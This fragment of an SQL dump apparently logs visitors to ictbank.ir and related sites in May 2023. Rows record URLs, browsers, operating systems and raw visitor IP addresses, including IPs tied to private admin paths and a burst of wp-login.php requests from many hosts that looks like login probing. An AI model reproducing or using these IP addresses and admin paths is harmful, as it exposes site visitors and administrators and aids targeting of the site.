(32683,'2023-05-14','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(32684,'2023-05-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','91.240.118.252','000',0,1,0),
(32685,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32686,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','74.82.47.194','000',0,1,0),
(32687,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.246.188.67','000',0,5,0),
(32688,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.177','000',0,1,0),
(32689,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.47','000',0,1,0),
(32690,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.54','000',0,1,0),
(32691,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.102.247','000',0,1,0),
(32692,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.247','000',0,2,0),
(32693,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.102.250','000',0,1,0),
(32694,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.246','000',0,1,0),
(32695,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.154','000',0,1,0),
(32696,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.43','000',0,2,0),
(32697,'2023-05-14','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.246.188.74','000',0,1,0),
(32698,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','113.0.0.0','desktop','Unknown','','79.132.212.174','000',0,20,0),
(32699,'2023-05-14','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','185.225.74.116','000',0,2,0),
(32700,'2023-05-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(32701,'2023-05-14','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.92','000',0,1,0),
(32702,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','45.158.49.95','000',0,1,0),
(32703,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','3.101.152.43','000',0,2,0),
(32704,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','202.158.23.99','000',0,127,0),
(32705,'2023-05-14','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.162.141','000',0,3,0),
(32706,'2023-05-14','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','74.249.60.71','000',0,16,0),
(32707,'2023-05-14','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32708,'2023-05-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(32709,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','75.119.223.218','000',0,2,0),
(32710,'2023-05-14','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32711,'2023-05-14','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.172.249.22','000',0,2,0),
(32712,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.166.233.202','000',0,1,0),
(32713,'2023-05-14','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','71.6.158.166','000',0,1,0),
(32714,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','95.111.242.129','000',0,1,0),
(32715,'2023-05-14','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','103.93.59.155','000',0,1,0),
(32716,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','176.9.47.122','000',0,1,0),
(32717,'2023-05-14','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','212.47.221.241','000',0,1,0),
(32718,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','116.62.155.4','000',0,1,0),
(32719,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.243.136.234','000',0,1,0),
(32720,'2023-05-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32721,'2023-05-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.133.63.31','000',0,1,0),
(32722,'2023-05-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(32723,'2023-05-14','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32724,'2023-05-14','https://45.92.94.221/blog','Chrome','Linux','80.0.0','desktop','Unknown','','152.32.245.214','000',0,19,0),
(32725,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32726,'2023-05-15','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.213','000',0,1,0),
(32727,'2023-05-15','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32728,'2023-05-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(32729,'2023-05-15','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','74.249.60.71','000',0,5,0),
(32730,'2023-05-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,16,0),
(32731,'2023-05-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','62.210.185.4','000',0,1,0),
(32732,'2023-05-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','193.37.69.152','000',0,1,0),
(32733,'2023-05-15','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.225.243','000',0,9,0),
(32734,'2023-05-15','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,3,0),
(32735,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(32736,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','54.81.61.115','000',0,2,0),
(32737,'2023-05-15','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.76','000',0,2,0),
(32738,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,1,0),
(32739,'2023-05-15','https://ictbank.ir/productmatrix/admin/index.php?pid=functions','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,54,0),
(32740,'2023-05-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','122.176.24.20','000',0,1,0),
(32741,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','134.209.153.18','000',0,1,0),
(32742,'2023-05-15','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(32743,'2023-05-15','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32744,'2023-05-15','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.167.213','000',0,109,0),
(32745,'2023-05-15','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(32746,'2023-05-15','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','18.208.192.54','000',0,1,0),
(32747,'2023-05-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,4,0),
(32748,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.195.34.242','000',0,2,0),
(32749,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(32750,'2023-05-15','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','142.93.48.245','000',0,1,0),
(32751,'2023-05-15','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32752,'2023-05-15','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','64.90.48.191','000',0,1,0),
(32753,'2023-05-15','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.153.103','000',0,9,0),
(32754,'2023-05-15','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','143.198.92.18','000',0,7,0),
(32755,'2023-05-15','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.145.123','000',0,2,0),
(32756,'2023-05-15','https://ictbank.ir/blog','Firefox','Windows','88.0','desktop','Unknown','','16.170.78.11','000',0,1,0),
(32757,'2023-05-15','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','45.142.114.105','000',0,1,0),
(32758,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(32759,'2023-05-15','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(32760,'2023-05-15','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','82.223.50.47','000',0,2,0),
(32761,'2023-05-15','https://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','176.9.114.107','000',0,1,0),
(32762,'2023-05-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(32763,'2023-05-15','https://45.92.94.221:443/blog','Chrome','Chrome OS','36.0.0.0','desktop','Unknown','','106.75.176.225','000',0,4,0),
(32764,'2023-05-15','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','74.201.28.5','000',0,1,0),
(32765,'2023-05-15','https://ictbank.ir/blog','Opera','Windows','6.0','desktop','Unknown','','141.94.176.106','000',0,5,0),
(32766,'2023-05-15','https://ictbank.ir/blog','Chrome','OS X','90.0.0','desktop','Macintosh','','152.32.174.92','000',0,17,0),
(32767,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','173.249.16.244','000',0,2,0),
(32768,'2023-05-16','https://ictbank.ir/blog','Chrome','Android','83.0.0.0','mobile:smart','Xperia L1','','50.31.21.10','000',0,3,0),
(32769,'2023-05-16','https://ictbank.ir/blog','Opera','OS X','89.0.0.0','desktop','Macintosh','','23.229.53.40','000',0,3,0),
(32770,'2023-05-16','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32771,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(32772,'2023-05-16','https://ictbank.ir/blog','Vivaldi','OS X','5.0.0.0','desktop','Macintosh','','172.252.163.89','000',0,1,0),
(32773,'2023-05-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','77.95.35.20','000',0,1,0),
(32774,'2023-05-16','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','194.169.175.92','000',0,1,0),
(32775,'2023-05-16','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(32776,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(32777,'2023-05-16','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','34.212.114.15','000',0,3,0),
(32778,'2023-05-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(32779,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','149.28.78.123','000',0,2,0),
(32780,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32781,'2023-05-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(32782,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(32783,'2023-05-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(32784,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32785,'2023-05-16','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','185.225.74.116','000',0,1,0),
(32786,'2023-05-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.24.126','000',0,1,0),
(32787,'2023-05-16','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','114.108.148.220','000',0,1,0),
(32788,'2023-05-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32789,'2023-05-16','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(32790,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32791,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.170','000',0,1,0),
(32792,'2023-05-16','https://ictbank.ir/blog','Chrome','Linux','89.0.0.0','desktop','Unknown','','144.91.106.14','000',0,5,0),
(32793,'2023-05-16','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','222.110.52.11','000',0,1,0),
(32794,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(32795,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.252.135','000',0,1,0),
(32796,'2023-05-16','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,4,0),
(32797,'2023-05-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(32798,'2023-05-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.9.244','000',0,1,0),
(32799,'2023-05-16','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','67.231.26.219','000',0,1,0),
(32800,'2023-05-16','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32801,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(32802,'2023-05-16','https://ictbank.ir/productmatrix/admin/index.php?pid=functions','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.22.79.173','000',0,1,0),
(32803,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32804,'2023-05-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.11','000',0,3,0),
(32805,'2023-05-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(32806,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.137.0','000',0,1,0),
(32807,'2023-05-16','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(32808,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','89.104.84.149','000',0,1,0),
(32809,'2023-05-16','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.90','000',0,2,0),
(32810,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.90.227.197','000',0,1,0),
(32811,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(32812,'2023-05-16','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.2.204','000',0,1,0),
(32813,'2023-05-17','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(32814,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.40.68','000',0,1,0),
(32815,'2023-05-17','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32816,'2023-05-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.189','000',0,4,0),
(32817,'2023-05-17','https://ictbank.ir/blog','Edge','Windows','100.0.0.0','desktop','Unknown','','45.61.138.74','000',0,1,0),
(32818,'2023-05-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.190.107','000',0,3,0),
(32819,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.39.188.166','000',0,1,0),
(32820,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.130.62','000',0,1,0),
(32821,'2023-05-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32822,'2023-05-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','46.38.249.63','000',0,1,0),
(32823,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','165.22.223.82','000',0,1,0),
(32824,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','46.101.123.58','000',0,4,0),
(32826,'2023-05-17','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32827,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','172.104.190.190','000',0,2,0),
(32828,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','153.92.16.50','000',0,4,0),
(32829,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','145.239.3.48','000',0,2,0),
(32830,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','166.62.32.44','000',0,2,0),
(32831,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','52.35.237.104','000',0,2,0),
(32832,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','89.43.17.94','000',0,1,0),
(32833,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.203.48.58','000',0,3,0),
(32834,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','124.43.161.78','000',0,1,0),
(32835,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','195.136.79.3','000',0,1,0),
(32837,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','83.166.138.107','000',0,2,0),
(32838,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','173.237.190.209','000',0,2,0),
(32839,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','116.203.39.224','000',0,4,0),
(32840,'2023-05-17','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','217.70.32.9','000',0,2,0),
(32841,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','206.81.8.99','000',0,1,0),
(32842,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','171.244.139.185','000',0,3,0),
(32843,'2023-05-17','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','3.125.71.74','000',0,1,0),
(32844,'2023-05-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,8,0),
(32845,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','64.225.115.204','000',0,2,0),
(32846,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','158.144.42.72','000',0,2,0),
(32847,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','212.92.41.71','000',0,2,0),
(32848,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.206','000',0,1,0),
(32849,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','157.7.184.17','000',0,2,0),
(32850,'2023-05-17','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.204','000',0,1,0),
(32851,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','165.227.14.225','000',0,2,0),
(32852,'2023-05-17','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.224.13','000',0,1,0),
(32853,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','13.233.232.102','000',0,2,0),
(32854,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.230.17','000',0,2,0),
(32855,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.0.229.122','000',0,2,0),
(32856,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','95.217.230.103','000',0,2,0),
(32857,'2023-05-17','https://ictbank.ir/blog','Chrome','Linux','86.0.0','desktop','Unknown','','103.56.61.132','000',0,2,0),
(32858,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','3.215.203.54','000',0,2,0),
(32859,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','5.79.64.244','000',0,2,0),
(32860,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','94.23.45.209','000',0,2,0),
(32861,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','104.161.66.10','000',0,2,0),
(32862,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','94.124.94.212','000',0,2,0),
(32863,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','129.232.187.186','000',0,2,0),
(32864,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','13.234.153.22','000',0,2,0),
(32865,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','129.226.175.186','000',0,2,0),
(32866,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','49.12.205.147','000',0,2,0),
(32867,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.54.126.122','000',0,2,0),
(32868,'2023-05-17','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','107.180.109.20','000',0,2,0),
(32869,'2023-05-17','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','103.195.238.60','000',0,1,0),
(32870,'2023-05-17','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.77','000',0,2,0),
(32871,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.210.85.133','000',0,2,0),
(32872,'2023-05-17','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,1,0),
(32873,'2023-05-17','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(32874,'2023-05-17','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32875,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.201.83','000',0,2,0),
(32876,'2023-05-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(32877,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','64.227.162.4','000',0,1,0),
(32878,'2023-05-17','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(32879,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','159.89.235.72','000',0,1,0),
(32880,'2023-05-17','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.70','000',0,2,0),
(32881,'2023-05-17','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','190.96.85.156','000',0,1,0),
(32882,'2023-05-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(32883,'2023-05-17','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','122.155.3.106','000',0,1,0),
(32884,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.16','000',0,1,0),
(32885,'2023-05-17','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','64.225.56.109','000',0,1,0),
(32886,'2023-05-17','https://ictbank.ir/blog','Firefox','Linux','1.0.0','desktop','Unknown','','193.37.255.217','000',0,7,0),
(32887,'2023-05-17','https://ictbank.ir/blog','Firefox','Linux','1.0.0','desktop','Unknown','','193.37.255.216','000',0,7,0),
(32888,'2023-05-17','https://ictbank.ir/blog','Firefox','Linux','1.0.0','desktop','Unknown','','193.37.255.215','000',0,8,0),
(32889,'2023-05-17','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','69.163.163.117','000',0,1,0),
(32890,'2023-05-17','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','64.59.72.109','000',0,1,0),
(32891,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.218.199.83','000',0,1,0),
(32892,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','95.214.27.21','000',0,5,0),
(32893,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','198.58.105.128','000',0,1,0),
(32894,'2023-05-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','193.37.69.152','000',0,1,0),
(32895,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(32896,'2023-05-17','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.135','000',0,1,0),
(32897,'2023-05-18','http://45.92.94.221','Firefox','Windows','110.0','desktop','Unknown','','45.142.114.73','000',0,3,0),
(32898,'2023-05-18','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','194.55.224.253','000',0,1,0),
(32899,'2023-05-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,5,0),
(32900,'2023-05-18','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(32901,'2023-05-18','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32902,'2023-05-18','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(32903,'2023-05-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.168.66.0','000',0,1,0),
